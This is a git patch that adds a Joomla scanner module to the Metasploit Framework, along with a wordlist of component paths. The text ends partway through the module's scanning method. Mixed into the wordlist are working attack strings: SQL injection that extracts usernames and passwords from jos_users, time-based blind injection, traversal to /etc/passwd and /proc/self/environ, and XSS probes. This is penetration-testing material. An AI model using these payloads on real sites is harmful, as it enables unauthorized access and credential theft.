From 0b61d28e0ee433e9a9daf9f411b61993e30c5baa Mon Sep 17 00:00:00 2001
From: f8lerror <f8lerror+git@gmail.com>
Date: Thu, 17 Jan 2013 11:36:59 -0500
Subject: [PATCH] added Joomla scanner and url wordlist

---
 data/wordlists/pcheck.txt                     | 627 ++++++++++++++++++
 .../auxiliary/scanner/http/joomla_vulnscan.rb | 270 ++++++++
 2 files changed, 897 insertions(+)
 create mode 100755 data/wordlists/pcheck.txt
 create mode 100755 modules/auxiliary/scanner/http/joomla_vulnscan.rb

diff --git a/data/wordlists/pcheck.txt b/data/wordlists/pcheck.txt
new file mode 100755
index 0000000000..b65dd2a422
--- /dev/null
+++ b/data/wordlists/pcheck.txt
@@ -0,0 +1,627 @@
+&controller=../../../../../../../../../../../../[LFI]%00
+?1.5.10-x
+?1.5.11-x-http_ref
+?1.5.11-x-php-s3lf
+?1.5.3-path-disclose
+?1.5.3-spam
+?1.5.8-x
+?1.5.9-x
+?j1012-fixate-session
+?option=com_mysms&Itemid=0&task=phonebook
+Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png
+admin/
+administrator/
+administrator/components/
+administrator/components/com_a6mambocredits/
+administrator/components/com_a6mambohelpdesk/
+administrator/components/com_admin/admin.admin.html.php
+administrator/components/com_astatspro/refer.php
+administrator/components/com_bayesiannaivefilter/
+administrator/components/com_chronocontact/excelwriter/PPS/File.php
+administrator/components/com_colophon/
+administrator/components/com_colorlab/
+administrator/components/com_comprofiler/
+administrator/components/com_comprofiler/plugin.class.php
+administrator/components/com_cropimage/admin.cropcanvas.php
+administrator/components/com_extplorer/
+administrator/components/com_feederator/includes/tmsp/add_tmsp.php
+administrator/components/com_googlebase/
+administrator/components/com_installer
+administrator/components/com_jcs/
+administrator/components/com_jim/
+administrator/components/com_jjgallery/
+administrator/components/com_joom12pic/
+administrator/components/com_joomla-visites/
+administrator/components/com_joomla_flash_uploader/
+administrator/components/com_joomlaflashfun/
+administrator/components/com_joomlaradiov5/
+administrator/components/com_jpack/
+administrator/components/com_jreactions/
+administrator/components/com_juser/
+administrator/components/com_admin/
+administrator/components/com_kochsuite /
+administrator/components/com_linkdirectory/
+administrator/components/com_livechat/getSavedChatRooms.php
+administrator/components/com_livechat/xmlhttp.php
+administrator/components/com_lurm_constructor/admin.lurm_constructor.php
+administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lo.php");
+administrator/components/com_mambelfish/
+administrator/components/com_mgm/
+administrator/components/com_mmp/help.mmp.php
+administrator/components/com_mosmedia/
+administrator/components/com_multibanners/extadminmenus.class.php
+administrator/components/com_panoramic/
+administrator/components/com_peoplebook/param.peoplebook.php
+administrator/components/com_phpshop/toolbar.phpshop.html.php
+administrator/components/com_remository/admin.remository.php
+administrator/components/com_serverstat/install.serverstat.php
+administrator/components/com_simpleswfupload/uploadhandler.php");
+administrator/components/com_swmenupro/
+administrator/components/com_treeg/
+administrator/components/com_uhp/
+administrator/components/com_uhp2/
+administrator/components/com_webring/
+administrator/components/com_wmtgallery/
+administrator/components/com_wmtportfolio/
+administrator/components/com_x-shop/
+administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+
+administrator/index.php?option=com_searchlog&act=log
+ajaxim/
+akocomments.php
+cart?Itemid=[SQLi]
+component/com__brightweblinks/
+component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0
+component/osproperty/?task=agent_register
+component/quran/index.php?option=com_quran&action=viewayat&surano=
+components/com_ clickheat/
+components/com_5starhotels/
+components/com_Jambook/jambook.php
+components/com_a6mambocredits/
+components/com_a6mambohelpdesk/
+components/com_ab_gallery/
+components/com_acajoom/
+components/com_acctexp/
+components/com_aclassf/
+components/com_activities/
+components/com_actualite/
+components/com_admin/admin.admin.html.php
+components/com_advancedpoll/
+components/com_agora/
+components/com_agoragroup/
+components/com_ajaxchat/
+components/com_akobook/
+components/com_akocomment/
+components/com_akogallery
+components/com_alberghi/
+components/com_allhotels/
+components/com_alphacontent/
+components/com_altas/
+components/com_amocourse/
+components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php
+components/com_articles/
+components/com_artist/
+components/com_artlinks/
+components/com_asortyment/
+components/com_astatspro/
+components/com_awesom/
+components/com_babackup/
+components/com_banners/
+components/com_bayesiannaivefilter/
+components/com_be_it_easypartner/
+components/com_beamospetition/
+components/com_biblestudy/
+components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
+components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
+components/com_blog/
+components/com_bookflip/
+components/com_bookjoomlas/
+components/com_booklibrary/
+components/com_books/
+components/com_bsadv/
+components/com_bsq_sitestats/
+components/com_bsq_sitestats/external/rssfeed.php
+components/com_bsqsitestats/
+components/com_calendar/
+components/com_camelcitydb2/
+components/com_candle/
+components/com_casino_blackjack/
+components/com_casino_videopoker/
+components/com_casinobase/
+components/com_catalogproduction/
+components/com_catalogshop/
+components/com_category/
+components/com_cgtestimonial/video.php?url="><script>alert('xss');</script>
+components/com_chronocontact/excelwriter/PPS/File.php
+components/com_cinema/
+components/com_clasifier/
+components/com_classifieds/
+components/com_clickheat/
+components/com_cloner/
+components/com_cmimarketplace/
+components/com_cms/
+components/com_colophon/
+components/com_colorlab/
+components/com_competitions/
+components/com_comprofiler/
+components/com_comprofiler/plugin.class.php
+components/com_contactinfo/
+components/com_content/
+components/com_cpg/cpg.php
+components/com_cropimage/admin.cropcanvas.php
+components/com_custompages/
+components/com_cx/
+components/com_d3000/
+components/com_dadamail/
+components/com_dailymessage/
+components/com_datsogallery/
+components/com_dbquery/
+components/com_detail/
+components/com_digistore/
+components/com_directory/
+components/com_djiceshoutbox/
+components/com_doc/
+components/com_downloads/
+components/com_ds-syndicate/
+components/com_dtregister/
+components/com_dv/externals/phpupload/upload.php");
+components/com_easybook/
+components/com_emcomposer/
+components/com_equotes/
+components/com_estateagent/
+components/com_eventing/
+components/com_eventlist/
+components/com_events/
+components/com_ewriting/
+components/com_expose/uploadimg.php
+components/com_expshop/
+components/com_extcalendar/
+components/com_extcalendar/cal_popup.php?extmode=view&extid=
+components/com_extcalendar/extcalendar.php
+components/com_extended_registration/registration_detailed.inc.php
+components/com_extplorer/
+components/com_ezine/
+components/com_ezstore/
+components/com_facileforms/
+components/com_fantasytournament/
+components/com_faq/
+components/com_feederator/includes/tmsp/add_tmsp.php
+components/com_filebase/
+components/com_filiale/
+components/com_flashfun/
+components/com_flashmagazinedeluxe/
+components/com_flippingbook/
+components/com_flyspray/startdown.php
+components/com_fm/fm.install.php
+components/com_foevpartners/
+components/com_football/
+components/com_formtool/
+components/com_forum/
+components/com_fq/
+components/com_fundraiser/
+components/com_galeria/
+components/com_galleria/galleria.html.php
+components/com_gallery/
+components/com_game/
+components/com_gameq/
+components/com_garyscookbook/
+components/com_genealogy/
+components/com_geoboerse/
+components/com_gigcal/
+components/com_gmaps/
+components/com_googlebase/
+components/com_gsticketsystem/
+components/com_guide/
+components/com_hashcash/server.php
+components/com_hbssearch/
+components/com_hello_world/
+components/com_hotproperties/
+components/com_hotproperty/
+components/com_hotspots/
+components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php
+components/com_hwdvideoshare/
+components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1");
+components/com_ice/
+components/com_idoblog/
+components/com_idvnews/
+components/com_ignitegallery/
+components/com_ijoomla_archive/
+components/com_ijoomla_rss/
+components/com_inter/
+components/com_ionfiles/
+components/com_is/
+components/com_ixxocart/
+components/com_jabode/
+components/com_jashowcase/
+components/com_jb2/
+components/com_jce/
+components/com_jcs/
+components/com_jd-wiki/
+components/com_jd-wp/
+components/com_jim/
+components/com_jjgallery/
+components/com_jmovies/
+components/com_jobline/
+components/com_jombib/
+components/com_joobb/
+components/com_jooget/
+components/com_joom12pic/
+components/com_joomla-visites/
+components/com_joomla_flash_uploader/
+components/com_joomlaboard/
+components/com_joomladate/ 
+components/com_joomlaflashfun/
+components/com_joomlalib/
+components/com_joomlaradiov5/
+components/com_joomlavvz/
+components/com_joomlaxplorer/
+components/com_joomloads/
+components/com_joomradio/
+components/com_joomtracker/
+components/com_joovideo/
+components/com_jotloader/
+components/com_journal/
+components/com_jpack/
+components/com_jpad/
+components/com_jreactions/
+components/com_jreviews/scripts/xajax.inc.php
+components/com_jumi/
+components/com_juser/
+components/com_jvideo/
+components/com_k2/
+components/com_kbase/
+components/com_knowledgebase/fckeditor/fckeditor.js
+components/com_kochsuite /
+components/com_kunena/
+components/com_letterman/
+components/com_lexikon/
+components/com_linkdirectory/
+components/com_listoffreeads/
+components/com_livechat/getSavedChatRooms.php
+components/com_livechat/xmlhttp.php
+components/com_liveticker/
+components/com_lm/
+components/com_lmo/
+components/com_loudmounth/includes/abbc/abbc.class.php
+components/com_loudmouth/
+components/com_lowcosthotels/
+components/com_lurm_constructor/admin.lurm_constructor.php
+components/com_mad4joomla/
+components/com_madeira/img.php
+components/com_maianmusic/
+components/com_mailarchive/
+components/com_mailto/
+components/com_mambatstaff/mambatstaff.php
+components/com_mambelfish/
+components/com_mambospgm/
+components/com_mambowiki/MamboLogin.php
+components/com_marketplace/
+components/com_mcquiz/
+components/com_mdigg/
+components/com_media_library/
+components/com_mediaslide/
+components/com_mezun/
+components/com_mgm/
+components/com_minibb/
+components/com_misterestate/
+components/com_mmp/help.mmp.php
+components/com_model/
+components/com_moodle/moodle.php
+components/com_moofaq/
+components/com_mosmedia/
+components/com_mospray/scripts/admin.php
+components/com_mosres/
+components/com_most/
+components/com_mp3_allopass/
+components/com_mtree/
+components/com_mtree/img/listings/o/{id}.php
+components/com_multibanners/extadminmenus.class.php
+components/com_myalbum/
+components/com_mycontent/
+components/com_mydyngallery/
+components/com_mygallery/
+components/com_n-forms/
+components/com_na_content/
+components/com_na_mydocs/
+components/com_na_newsdescription/
+components/com_na_qforms/
+components/com_neogallery/
+components/com_neorecruit/
+components/com_neoreferences/
+components/com_netinvoice/
+components/com_news/
+components/com_news_portal/
+components/com_newsflash/
+components/com_nfn_addressbook/
+components/com_nicetalk/
+components/com_noticias/
+components/com_omnirealestate/
+components/com_omphotogallery/
+components/com_ongumatimesheet20/
+components/com_onlineflashquiz/
+components/com_ownbiblio/
+components/com_panoramic/
+components/com_paxgallery/
+components/com_paxxgallery/
+components/com_pcchess/
+components/com_pcchess/include.pcchess.php
+components/com_pccookbook/
+components/com_pccookbook/pccookbook.php
+components/com_peoplebook/param.peoplebook.php
+components/com_performs/
+components/com_philaform/
+components/com_phocadocumentation/
+components/com_php/
+components/com_phpshop/toolbar.phpshop.html.php
+components/com_pinboard/
+components/com_pms/
+components/com_poll/
+components/com_pollxt/
+components/com_ponygallery/
+components/com_portafolio/
+components/com_portfol/
+components/com_prayercenter/
+components/com_pro_desk/
+components/com_prod/
+components/com_productshowcase/
+components/com_profiler/
+components/com_projectfork/
+components/com_propertylab/
+components/com_puarcade/
+components/com_publication/
+components/com_quiz/
+components/com_rapidrecipe/
+components/com_rdautos/
+components/com_realestatemanager/
+components/com_recly/
+components/com_referenzen/
+components/com_rekry/
+components/com_remository/admin.remository.php
+components/com_remository_files/file_image_14/1276100016shell.php
+components/com_reporter/processor/reporter.sql.php
+components/com_resman/
+components/com_restaurante/
+components/com_ricette/
+components/com_rsfiles/
+components/com_rsgallery/
+components/com_rsgallery2/
+components/com_rss/
+components/com_rssreader/
+components/com_rssxt/
+components/com_rwcards/
+components/com_school/
+components/com_search/
+components/com_sebercart/getPic.php?p=[LFD]%00
+components/com_securityimages/
+components/com_sef/
+components/com_seminar/
+components/com_serverstat/install.serverstat.php
+components/com_sg/
+components/com_simple_review/
+components/com_simpleboard/
+components/com_simplefaq/
+components/com_simpleshop/
+components/com_sitemap/sitemap.xml.php
+components/com_slideshow/
+components/com_smf/
+components/com_smf/smf.php
+components/com_swmenupro/
+components/com_team/
+components/com_tech_article/
+components/com_thopper/
+components/com_thyme/
+components/com_tickets/
+components/com_tophotelmodule/
+components/com_tour_toto/
+components/com_trade/
+components/com_uhp/
+components/com_uhp2/
+components/com_user/controller.php
+components/com_users/
+components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php
+components/com_vehiclemanager/
+components/com_versioning /
+components/com_videodb/core/videodb.class.xml.php
+components/com_virtuemart/
+components/com_volunteer/
+components/com_vr/
+components/com_waticketsystem/
+components/com_webhosting/
+components/com_weblinks/
+components/com_webring/
+components/com_wmtgallery/
+components/com_wmtportfolio/
+components/com_x-shop/
+components/com_xevidmegahd/
+components/com_xewebtv/
+components/com_xfaq/
+components/com_xgallery/helpers/img.php?file=
+components/com_xsstream-dm/
+components/com_ynews/
+components/com_yvcomment/
+components/com_zoom/classes/
+components/mod_letterman/
+components/remository/
+eXtplorer/
+easyblog/entry/uncategorized
+extplorer/
+http://{target}/components/com_mtree/img/listings/o/{id}.php where {id}
+includes/joomla.php
+index.php/404'
+index.php/?option=com_question&catID=21' and+1=0 union all
+index.php/image-gallery/"><script>alert('xss')</script>/25-koala
+index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&amp;type=css&v=1
+index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view
+index.php?option=com_aardvertiser&cat_name=conf&task=<=
+index.php?option=com_aardvertiser&task=
+index.php?option=com_abc&view=abc&letter=AS&sectionid='
+index.php?option=com_advert&id=36'
+index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users--
+index.php?option=com_alfurqan15x&action=viewayat&surano=
+index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version
+index.php?option=com_annonces&view=edit&Itemid=1
+index.php?option=com_articleman&task=new
+index.php?option=com_bbs&bid=-1
+index.php?option=com_beamospetition&startpage=3&pet=-
+index.php?option=com_beamospetition&startpage=3&pet=-1+Union+select+user()+from+jos_users-
+index.php?option=com_bearleague&task=team&tid=8&sid=1&Itemid=%27
+index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00
+index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
+index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
+index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=-1
+index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users--
+index.php?option=com_chronoconnectivity&itemid=1
+index.php?option=com_chronocontact&itemid=1
+index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=
+index.php?option=com_clantools&squad=1+
+index.php?option=com_clantools&task=clanwar&showgame=1+
+index.php?option=com_commedia&format=raw&task=image&pid=4&id=964'
+index.php?option=com_commedia&task=page&commpid=21
+index.php?option=com_connect&view=connect&controller=
+index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../
+index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00
+index.php?option=com_dioneformwizard&controller=[LFI]%00
+index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=-1
+index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12
+index.php?option=com_easyfaq&Itemid=1&task=view&gid=
+index.php?option=com_easyfaq&catid=1&task=view&id=-2527+
+index.php?option=com_easyfaq&task=view&contact_id=
+index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=
+index.php?option=com_equipment&task=components&id=45&sec_men_id=
+index.php?option=com_equipment&view=details&id=
+index.php?option=com_estateagent&Itemid=47&act=object&task=showEO&id=[sqli]
+index.php?option=com_etree&view=displays&layout=category&id=[SQL]
+index.php?option=com_etree&view=displays&layout=user&user_id=[SQL]
+index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1
+index.php?option=com_fabrik&view=table&tableid=13+union+select+1----
+index.php?option=com_filecabinet&task=download&cid[]=7
+index.php?option=com_firmy&task=section_show_set&Id=-1
+index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R
+index.php?option=com_golfcourseguide&view=golfcourses&cid=1&id=
+index.php?option=com_graphics&controller=
+index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0&data_search=
+index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0?data_search=&rpp=
+index.php?option=com_huruhelpdesk&view=detail
+index.php?option=com_huruhelpdesk&view=detail&cid[0]=
+index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1
+index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1 
+index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2 
+index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1
+index.php?option=com_iproperty&view=agentproperties&id=
+index.php?option=com_jacomment&view=
+index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00
+index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00
+index.php?option=com_jcommunity&controller=members&task=1'
+index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13
+index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2
+index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2
+index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00
+index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999,NULL),NULL)))
+index.php?option=com_jfuploader&Itemid=
+index.php?option=com_jgen&task=view&id=
+index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00
+index.php?option=com_jimtawl&Itemid=12&task=
+index.php?option=com_jmarket&controller=product&task=1'
+index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1'
+index.php?option=com_jomdirectory&task=search&type=111+
+index.php?option=com_joomdle&view=detail&cat_id=1&course_id=
+index.php?option=com_joomla_flash_uploader&Itemid=1
+index.php?option=com_joomleague&func=showNextMatch&p=[sqli]
+index.php?option=com_joomleague&view=resultsmatrix&p=4&Itemid=[sqli]
+index.php?option=com_joomtouch&controller=
+index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00
+index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00
+index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users
+index.php?option=com_jstore&controller=product-display&task=1'
+index.php?option=com_jsubscription&controller=subscription&task=1'
+index.php?option=com_jtickets&controller=ticket&task=1'
+index.php?option=com_konsultasi&act=detail&sid=
+index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en
+index.php?option=com_kunena&func=userlist&search=
+index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1'
+index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00
+index.php?option=com_markt&page=show_category&catid=7+union+select+0,1,password,3,4,5,username,7,8+from+jos_users--
+index.php?option=com_matamko&controller=
+index.php?option=com_myhome&task=4&nidimmindex.php?option=com_myhome&task=4&nidimm
+index.php?option=com_neorecruit&task=offer_view&id=
+index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
+index.php?option=com_noticeboard&controller=
+index.php?option=com_obsuggest&controller=
+index.php?option=com_ongallery&task=ft&id=-1+order+by+1--
+index.php?option=com_ongallery&task=ft&id=-1+union+select+1--
+index.php?option=com_oziogallery&Itemid=
+index.php?option=com_page&id=53
+index.php?option=com_pbbooking&task=validate&id=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(999999999,NULL),NULL)))
+index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00
+index.php?option=com_peliculas&view=peliculas&id=null[Sql Injection]
+index.php?option=com_phocagallery&view=categories&Itemid=
+index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
+index.php?option=com_php&file=../../../../../../../../../../etc/passwd
+index.php?option=com_php&file=../images/phplogo.jpg
+index.php?option=com_php&file=../js/ie_pngfix.js
+index.php?option=com_ponygallery&Itemid=[sqli]
+index.php?option=com_products&catid=-1
+index.php?option=com_products&id=-1
+index.php?option=com_products&product_id=-1
+index.php?option=com_products&task=category&catid=-1
+index.php?option=com_properties&task=agentlisting&aid=
+index.php?option=com_qcontacts&Itemid=1'
+index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts
+index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00
+index.php?option=com_restaurantguide&view=country&id='&Itemid=69
+index.php?option=com_rokmodule&tmpl=component&type=raw&module=1'
+index.php?option=com_seyret&view=
+index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--
+index.php?option=com_smartsite&controller=
+index.php?option=com_spa&view=spa_product&cid=
+index.php?option=com_spidercalendar
+index.php?option=com_spidercalendar&date=1'
+index.php?option=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
+index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
+index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
+index.php?option=com_staticxt&staticfile=test.php&id=1923
+index.php?option=com_szallasok&mode=8&id=25 (SQL)
+index.php?option=com_tag&task=tag&tag=
+index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users--
+index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users
+index.php?option=com_ultimateportfolio&controller=
+index.php?option=com_users&view=registration
+index.php?option=com_virtuemart&page=account.index&keyword=[sqli]
+index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00
+index.php?option=com_x-shop&action=artdetail&idd='
+index.php?option=com_x-shop&action=artdetail&idd='[SQLi]
+index.php?option=com_xcomp&controller=../../[LFI]%00
+index.php?option=com_xvs&controller=../../[LFI]%00
+index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--+Union+select+user()+from+jos_users--
+index.php?option=com_yjcontactus&view=
+index.php?option=com_youtube&id_cate=4
+index.php?option=com_zina&view=zina&Itemid=9
+index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id=
+index.php?search=NoGe&option=com_esearch&searchId=
+index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube
+index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users--
+js/index.php?option=com_socialads&view=showad&Itemid=94
+libraries/joomla/utilities/compat/php50x.php
+libraries/pcl/pcltar.php
+libraries/phpmailer/phpmailer.php
+libraries/phpxmlrpc/xmlrpcs.php
+modules/mod_artuploader/upload.php");
+modules/mod_as_category.php
+modules/mod_calendar.php
+modules/mod_ccnewsletter/helper/popup.php?id=[SQLi]
+modules/mod_dionefileuploader/upload.php?module_dir=./&module_max=2097152&file_type=application/octet-stream");
+modules/mod_jfancy/script.php");
+modules/mod_ppc_simple_spotlight/elements/upload_file.php
+modules/mod_ppc_simple_spotlight/img/
+modules/mod_pxt/
+modules/mod_quick_question.php
+modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0
+patch/makedown.php?arquivo=../../../../etc/passwd
+plugins/content/efup_files/helper.php");
+plugins/editors/idoeditor/themes/advanced/php/image.php" method="post" enctype="multipart/form-data">
+plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
+plugins/editors/xstandard/attachmentlibrary.php
+print.php?task=person&id=36 and 1=1
+templates/be2004-2/
+templates/ja_purity/
+wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--
+web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=1'
\ No newline at end of file
diff --git a/modules/auxiliary/scanner/http/joomla_vulnscan.rb b/modules/auxiliary/scanner/http/joomla_vulnscan.rb
new file mode 100755
index 0000000000..c8cbfbae27
--- /dev/null
+++ b/modules/auxiliary/scanner/http/joomla_vulnscan.rb
@@ -0,0 +1,270 @@
+##
+# $Id: joomla_vulnscan.rb
+##
+##
+#Thanks to @zeroSteiner @kaospunk helping with examples and questions. Also thanks to Joomscan and various MSF modules for code examples.
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::Scanner
+	include Msf::Auxiliary::Report
+
+	def initialize
+		super(
+			'Name'        => 'Joomla Scanner',
+			'Version'     => '$Revision: 14774 $',
+			'Description' => %q{
+					This module scans the Joomla install for information and potential vulnerabilites.
+			},
+			'Author'      => [ 'f8lerror' ],
+			'License'     => MSF_LICENSE
+		)
+	register_options(
+			[
+				OptString.new('PATH', [ true,  "The path to the Joomla install", '/']),
+				OptBool.new('ENUMERATE', [ false, "Enumerate Plugins", true]),
+
+				OptPath.new('PLUGINS',   [ false, "Path to list of plugins to enumerate",
+						File.join(Msf::Config.install_root, "data", "wordlists", "pcheck.txt")
+					]
+				)
+
+			], self.class)
+	end
+
+	def osfingerprint(response)
+		if(response.headers.has_key?('Server') )
+			if(response.headers['Server'] =~/Win32/ or response.headers['Server'] =~ /\(Windows/ or response.headers['Server'] =~ /IIS/)
+				os = "Windows"
+			elsif(response.headers['Server'] =~ /Apache\// and response.headers['Server'] !~/(Win32)/)
+					os = "*Nix"
+			else
+				os = "Unknown Server Header Reporting: "+response.headers['Server']
+			end
+		end
+		return os
+		end
+	def fingerprint(response, app)
+
+		if(response.body =~ /<version.*\/?>(.+)<\/version\/?>/i)
+			v = $1
+			out = (v =~ /^6/) ? "Joomla #{v}" : " #{v}"
+		elsif(response.body =~ /system\.css 20196 2011\-01\-09 02\:40\:25Z ian/ or
+			response.body =~ /MooTools\.More\=\{version\:\"1\.3\.0\.1\"/ or
+			response.body =~ /en-GB\.ini 20196 2011\-01\-09 02\:40\:25Z ian/ or
+			response.body =~ /en-GB\.ini 20990 2011\-03\-18 16\:42\:30Z infograf768/ or
+			response.body =~/20196 2011\-01\-09 02\:40\:25Z ian/)
+			out = "1.6"
+		elsif(response.body =~ /system\.css 21322 2011\-05\-11 01\:10\:29Z dextercowley / or
+			response.body =~ /MooTools\.More\=\{version\:\"1\.3\.2\.1\"/ or response.body =~ /22183 2011\-09\-30 09\:04\:32Z infograf768/ or response.body =~ /21660 2011\-06\-23 13\:25\:32Z infograf768/)
+			out = "1.7"
+		elsif(response.body =~ /Joomla! 1.5/ or
+			response.body =~ /MooTools\=\{version\:\'1\.12\'\}/ or response.body =~ /11391 2009\-01\-04 13\:35\:50Z ian/)
+			out = "1.5"
+		elsif(response.body =~ /Copyright \(C\) 2005 \- 2012 Open Source Matters/ or
+			response.body =~ /MooTools.More\=\{version\:\"1\.4\.0\.1\"/ )
+			out = "2.5"
+		elsif(response.body =~ /<meta name=\"Keywords\" content=\"(.*)\">\s+<meta name/)
+			out = $1.split(/,/)[0]
+		elsif(response.body =~ /(Copyright \(C\) 2005 - 200(6|7))/ or
+			response.body =~/47 2005\-09\-15 02\:55\:27Z rhuk/ or response.body =~/423 2005\-10\-09 18\:23\:50Z stingrey/ or
+			response.body =~/1005 2005\-11\-13 17\:33\:59Z stingrey/ or response.body =~/1570 2005\-12\-29 05\:53\:33Z eddieajau/ or
+			response.body =~/2368 2006\-02\-14 17\:40\:02Z stingrey/  or response.body =~/4085 2006\-06\-21 16\:03\:54Z stingrey/ or
+			response.body =~/4756 2006\-08\-25 16\:07\:11Z stingrey/ or response.body =~/5973 2006\-12\-11 01\:26\:33Z robs/  or
+			response.body =~/5975 2006\-12\-11 01\:26\:33Z robs/)
+			out = "1.0"
+		else
+			out = 'Unknown Joomla'
+		end
+		return out
+	end
+
+	def run_host(ip)
+		tpath = datastore['PATH']
+			if tpath[-1,1] != '/'
+			tpath += '/'
+			end
+		apps = [ 'language/en-GB/en-GB.xml',
+				'templates/system/css/system.css',
+				'media/system/js/mootools-more.js',
